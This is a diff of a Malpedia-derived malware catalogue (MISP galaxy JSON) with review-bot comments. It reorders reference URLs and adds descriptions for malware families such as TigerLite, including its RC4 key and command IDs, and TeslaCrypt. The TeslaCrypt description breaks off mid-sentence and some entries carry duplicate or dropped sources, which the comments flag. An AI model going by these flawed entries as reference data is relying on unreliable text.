+ "https://blog.minerva-labs.com/taurus-stealers-evolution",
 "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md"
+ "https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers",
+ "https://www.secureworks.com/research/the-growing-threat-from-infostealers",
+ "https://www.aon.com/cyber-solutions/aon_cyber_labs/agentvx-and-taurus/",
+ "https://outpost24.com/blog/an-in-depth-analysis-of-the-new-taurus-stealer/"
 ],
 "synonyms": [],
 "type": []
@@ -46684,8 +48881,8 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer",
 "https://securityintelligence.com/hammertoss-what-me-worry/",
 "https://www.youtube.com/watch?v=UE9suwyuic8",
- "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58",
- "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf"
+ "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf",
+ "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58"
 ],
 "synonyms": [
 "HAMMERTOSS",
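Review bot: The new refs list for win.taurus_stealer carries the same article twice, once at the kept `https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/an-in-depth-analysis-of-the-new-taurus-stealer/` and once at the added `https://outpost24.com/blog/an-in-depth-analysis-of-the-new-taurus-stealer/`; the TinyMet hunk at -47303 does the same with the `using-qiling-framework-to-unpack-ta505-packed-samples` post, and the Telebot (-46833) and TManger (-47425) hunks keep URL pairs that differ only by a trailing slash. If the generator copies refs verbatim from Malpedia the duplication is upstream, but normalizing trailing slashes and collapsing known domain migrations before emitting the cluster would keep the lists clean. The wholesale reordering of otherwise unchanged refs across these hunks also suggests the source order is not stable; a deterministic sort in the generator would make future updates reviewable.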
@@ -46713,8 +48910,7 @@
 "description": "Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the popular remote access and desktop sharing software, to gain full control of the infected computer.\r\nThis is achieved by sideloading another DLL among the legit TeamViewer.",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.teambot",
- "https://research.checkpoint.com/finteam-trojanized-teamviewer-against-government-targets/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teambot"
 ],
 "synonyms": [
 "FINTEAM"
@@ -46729,10 +48925,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.teamspy",
- "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/",
- "https://www.deepinstinct.com/blog/the-russian-spyagent-a-decade-later-and-rat-tools-remain-at-risk",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging",
 "https://blog.avast.com/a-deeper-look-into-malware-abusing-teamviewer",
+ "https://www.deepinstinct.com/blog/the-russian-spyagent-a-decade-later-and-rat-tools-remain-at-risk",
+ "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging",
 "https://www.cyber.nj.gov/threat-center/threat-profiles/trojan-variants/spy-agent"
 ],
 "synonyms": [
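Review bot: The win.teambot hunk drops `https://research.checkpoint.com/finteam-trojanized-teamviewer-against-government-targets/`, which is the Check Point write-up the description on the line above paraphrases, leaving the Malpedia page as the entry's only reference. Unless the removal mirrors an intentional upstream change (a dead link, say), the primary source should stay, or the description should be reworded so it no longer cites research the entry no longer links. The refs reorderings in this and the neighbouring hunks change nothing in content, so this deletion is easy to miss in the noise.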
@@ -46746,42 +48942,42 @@
 "value": "TeamSpy"
 },
 {
- "description": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file “gracious_truth.jpg”, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believe that this was used to execute a customized Cobalt Strike BEACON.",
+ "description": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file \u201cgracious_truth.jpg\u201d, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believe that this was used to execute a customized Cobalt Strike BEACON.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.teardrop",
- "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714",
- "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
 "https://www.brighttalk.com/webcast/7451/462719",
 "https://github.com/fireeye/sunburst_countermeasures",
- "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/",
- "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/",
- "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline",
- "https://twitter.com/TheEnergyStory/status/1346096298311741440",
- "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds",
- "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b",
- "https://twitter.com/craiu/status/1339954817247158272",
- "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
- "https://www.youtube.com/watch?v=LA-XE5Jy2kU",
 "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader",
- "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515",
- "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack",
- "https://www.youtube.com/watch?v=GfbxHy6xnbA",
- "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf",
- "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate",
- "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/",
- "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
+ "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
 "https://twitter.com/TheEnergyStory/status/1342041055563313152",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
+ "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate",
+ "https://www.youtube.com/watch?v=GfbxHy6xnbA",
+ "https://twitter.com/craiu/status/1339954817247158272",
+ "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714",
+ "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/",
+ "https://www.youtube.com/watch?v=LA-XE5Jy2kU",
+ "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
+ "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/",
+ "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more",
+ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
+ "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf",
+ "https://twitter.com/TheEnergyStory/status/1346096298311741440",
+ "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack",
+ "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/",
 "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
 "https://unit42.paloaltonetworks.com/atoms/solarphoenix/",
 "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
- "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/"
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf",
+ "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline"
 ],
 "synonyms": [],
 "type": []
@@ -46833,11 +49029,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot",
- "https://www.secureworks.com/research/threat-profiles/iron-viking",
+ "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks",
 "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
 "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine",
 "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
- "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks"
+ "https://www.secureworks.com/research/threat-profiles/iron-viking"
 ],
 "synonyms": [],
 "type": []
@@ -46850,9 +49046,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor",
- "https://www.secureworks.com/research/threat-profiles/iron-viking",
+ "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html",
 "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/",
- "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html"
+ "https://www.secureworks.com/research/threat-profiles/iron-viking"
 ],
 "synonyms": [],
 "type": []
@@ -46900,7 +49096,7 @@
 "value": "Teleport"
 },
 {
- "description": "",
+ "description": "According to PCrisk, Tellyouthepass is one of many ransomware-type programs used to block access to files by encryption and keep them in this state unless a ransom is paid.\r\n\r\nThe program renames all encrypted files by adding the \".locked\" extension and creates a ransom message in a text file called \"README.html\". For example, \"1.jpg\" is renamed by Tellyouthepass to \"1.jpg.locked\".\r\n\r\nAccording to cyber criminals, this ransomware encrypts data using RSA-1024 and AES-256 cryptography algorithms.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tellyouthepass",
@@ -46943,10 +49139,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat",
- "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf",
- "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf",
 "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
- "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf"
+ "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf",
+ "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf"
 ],
 "synonyms": [
 "Fakem RAT"
@@ -46962,8 +49158,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.termite",
 "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/",
- "https://www.mandiant.com/resources/evolution-of-fin7",
- "https://www.alienvault.com/blogs/labs-research/internet-of-termites"
+ "https://www.alienvault.com/blogs/labs-research/internet-of-termites",
+ "https://www.mandiant.com/resources/evolution-of-fin7"
 ],
 "synonyms": [],
 "type": []
@@ -46976,9 +49172,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.terrapreter",
- "https://www.esentire.com/web-native-pages/unmasking-venom-spider",
+ "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
 "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire",
- "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/"
+ "https://www.esentire.com/web-native-pages/unmasking-venom-spider"
 ],
 "synonyms": [],
 "type": []
@@ -46992,11 +49188,11 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_loader",
 "https://medium.com/walmartglobaltech/a-re-look-at-the-terraloader-dropper-dll-e5947ad6e244",
- "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware",
- "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-",
 "https://www.esentire.com/web-native-pages/unmasking-venom-spider",
- "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire",
- "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/"
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-",
+ "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/",
+ "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware",
+ "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire"
 ],
 "synonyms": [],
 "type": []
@@ -47027,10 +49223,10 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_stealer",
 "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://github.com/eset/malware-ioc/tree/master/evilnum",
- "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
 "https://twitter.com/3xp0rtblog/status/1275746149719252992",
- "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/"
+ "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/",
+ "https://github.com/eset/malware-ioc/tree/master/evilnum",
+ "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/"
 ],
 "synonyms": [
 "SONE",
@@ -47047,9 +49243,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_tv",
- "https://blog.minerva-labs.com/taurus-user-guided-infection",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
+ "https://blog.minerva-labs.com/taurus-user-guided-infection",
 "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9"
 ],
 "synonyms": [
@@ -47061,21 +49257,21 @@
 "value": "TerraTV"
 },
 {
- "description": "",
+ "description": "According to Kaspersky, detected in February 2015, the new ransomware Trojan gained immediate notoriety as a menace to computer gamers. Amongst other types of target files, it tries to infect typical gaming files: game saves, user profiles, recoded replays etc. That said, TeslaCrypt does not encrypt files that are larger than 268 MB. Recently,",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt",
- "https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/",
- "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla",
- "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/",
- "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/",
- "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/",
 "https://blogs.cisco.com/security/talos/teslacrypt",
- "https://blog.christophetd.fr/malware-analysis-lab-with-virtualbox-inetsim-and-burp/",
- "https://community.riskiq.com/article/30f22a00",
- "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html",
+ "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/",
 "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf",
- "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack"
+ "https://community.riskiq.com/article/30f22a00",
+ "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/",
+ "https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/",
+ "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html",
+ "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla",
+ "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/",
+ "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack",
+ "https://blog.christophetd.fr/malware-analysis-lab-with-virtualbox-inetsim-and-burp/"
 ],
 "synonyms": [
 "cryptesla"
@@ -47090,9 +49286,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower",
- "https://www.sygnia.co/mata-framework",
 "https://cyber.gc.ca/en/alerts/tflower-ransomware-campaign",
- "https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/"
+ "https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/",
+ "https://www.sygnia.co/mata-framework"
 ],
 "synonyms": [],
 "type": []
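Review bot: The new description for win.teslacrypt ends mid-sentence with `... does not encrypt files that are larger than 268 MB. Recently,`, so the entry ships a dangling fragment that was evidently cut during import. Either complete the sentence from the Kaspersky source the description attributes itself to, or trim the trailing ` Recently,` so the text ends at `268 MB.`. The enclosing TeslaCrypt object (its uuid and value) lies outside the hunk.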
@@ -47174,15 +49370,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/",
- "https://www.bleepingcomputer.com/news/security/thunderx-ransomware-rebrands-as-ranzy-locker-adds-data-leak-site/",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
 "https://www.picussecurity.com/resource/blog/a-detailed-walkthrough-of-ranzy-locker-ransomware-ttps",
+ "https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.bleepingcomputer.com/news/security/thunderx-ransomware-rebrands-as-ranzy-locker-adds-data-leak-site/",
 "https://www.ic3.gov/Media/News/2021/211026.pdf",
 "https://id-ransomware.blogspot.com/2020/08/thunderx-ransomware.html",
 "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/"
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3"
 ],
 "synonyms": [
 "Ranzy Locker"
@@ -47209,9 +49405,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool",
+ "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/",
 "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
 "https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs",
- "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/",
 "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf"
 ],
 "synonyms": [],
@@ -47220,18 +49416,38 @@
 "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca",
 "value": "Tidepool"
 },
+ {
+ "description": "TigerLite is a TCP downloader.\r\n\r\nIt creates mutexes like \"qtrgads32\" or \"Microsoft32\".\r\n\r\nIt uses RC4 with the key \"MicrosoftCorporationValidation@#$%^&*()!US\" for decryption of its character strings, and a custom algorithm for encryption and decryption of network traffic. \r\n\r\nIt supports from 5 up to 8 commands with the following identifiers: 1111, 1234, 2099/3333, 4444, 8877, 8888, 9876, 9999. The commands mostly perform various types of execution - either of code received from the server, or native Windows commands, with their output collected and sent back to the server.\r\n\r\nTigerLite is an intermediate step of a multi-stage attack, in which Tiger RAT is usually the next step. This malware was observed in attacks against South Korean entities in H1 2021.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tigerlite",
+ "https://threatray.com/wp-content/uploads/2021/12/threatray-establishing-the-tigerrat-and-tigerdownloader-malware-families.pdf",
+ "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/",
+ "https://ti.qianxin.com/blog/articles/Analysis-of-attacks-by-Lazarus-using-Daewoo-shipyard-as-bait/",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1fcd1afe-31ed-40c2-9262-6a6afe2a43e9",
+ "value": "TigerLite"
+ },
 {
 "description": "This is third stage backdoor mentioned in the Kaspersky blog, \"Andariel evolves to target South Korea with ransomware\". The third stage payload was created via the second stage payload, is interactively executed in the operation and exists in both x64 and x86 versions. Most of them use Internet Explorer or Google Chrome icons and corresponding file names to disguise themselves as legitimate internet browsers. The malware decrypts the embedded payload at runtime. It uses an embedded 16-byte XOR key to decrypt the base64 encoded payload. The decrypted payload is another portable executable file that runs in memory. Before getting decrypted with a hardcoded XOR key, the backdoor also checks for sandbox environment.\r\nThe backdoor has some code overlap with a know malware family PEBBLEDASH, attributed to Lazarus/LABYRINTH CHOLLIMA.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiger_rat",
- "https://www.attackiq.com/2023/01/05/emulating-the-highly-sophisticated-north-korean-adversary-lazarus-group/",
+ "https://asec.ahnlab.com/wp-content/uploads/2021/11/Lazarus-%EA%B7%B8%EB%A3%B9%EC%9D%98-NukeSped-%EC%95%85%EC%84%B1%EC%BD%94%EB%93%9C-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C.pdf",
 "https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html",
- "https://threatray.com/wp-content/uploads/2021/12/threatray-establishing-the-tigerrat-and-tigerdownloader-malware-families.pdf",
- "https://www.brighttalk.com/webcast/18282/493986",
- "https://www.krcert.or.kr/filedownload.do?attach_file_seq=3277&attach_file_id=EpF3277.pdf",
+ "https://asec.ahnlab.com/ko/56256/",
 "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/",
- "https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html"
+ "https://www.krcert.or.kr/filedownload.do?attach_file_seq=3277&attach_file_id=EpF3277.pdf",
+ "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF",
+ "https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html",
+ "https://www.attackiq.com/2023/01/05/emulating-the-highly-sophisticated-north-korean-adversary-lazarus-group/",
+ "https://www.brighttalk.com/webcast/18282/493986",
+ "https://threatray.com/wp-content/uploads/2021/12/threatray-establishing-the-tigerrat-and-tigerdownloader-malware-families.pdf",
+ "https://asec.ahnlab.com/en/56405/"
 ],
 "synonyms": [],
 "type": []
@@ -47257,20 +49473,20 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba",
- "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html",
- "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf",
+ "https://adalogics.com/blog/the-state-of-advanced-code-injections",
 "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant",
- "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/",
- "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/",
- "http://garage4hackers.com/entry.php?b=3086",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://blogs.blackberry.com/en/2019/03/blackberry-cylance-vs-tinba-banking-trojan",
- "http://contagiodump.blogspot.com/2012/06/amazon.html",
 "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
+ "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/",
+ "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html",
+ "http://garage4hackers.com/entry.php?b=3086",
+ "https://blogs.blackberry.com/en/2019/03/blackberry-cylance-vs-tinba-banking-trojan",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf",
 "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/",
- "https://adalogics.com/blog/the-state-of-advanced-code-injections"
+ "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
+ "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/",
+ "http://contagiodump.blogspot.com/2012/06/amazon.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf"
 ],
 "synonyms": [
 "Illi",
@@ -47282,13 +49498,26 @@
 "uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88",
 "value": "Tinba"
 },
+ {
+ "description": "TinyFluff is a dropper developed by the OldGremlin group. In one of their March '22 campaigns, TinyFluff included a JavaScript RAT with a time-independent DGA.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyfluff",
+ "https://www.group-ib.com/blog/oldgremlin-comeback/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e044c397-8491-466b-adb7-2deead4d9eb6",
+ "value": "TinyFluff"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader",
- "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software",
 "https://www.forcepoint.com/sites/default/files/resources/files/report-tinypos-analysis-en.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak"
 ],
@@ -47303,17 +49532,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/",
+ "https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/",
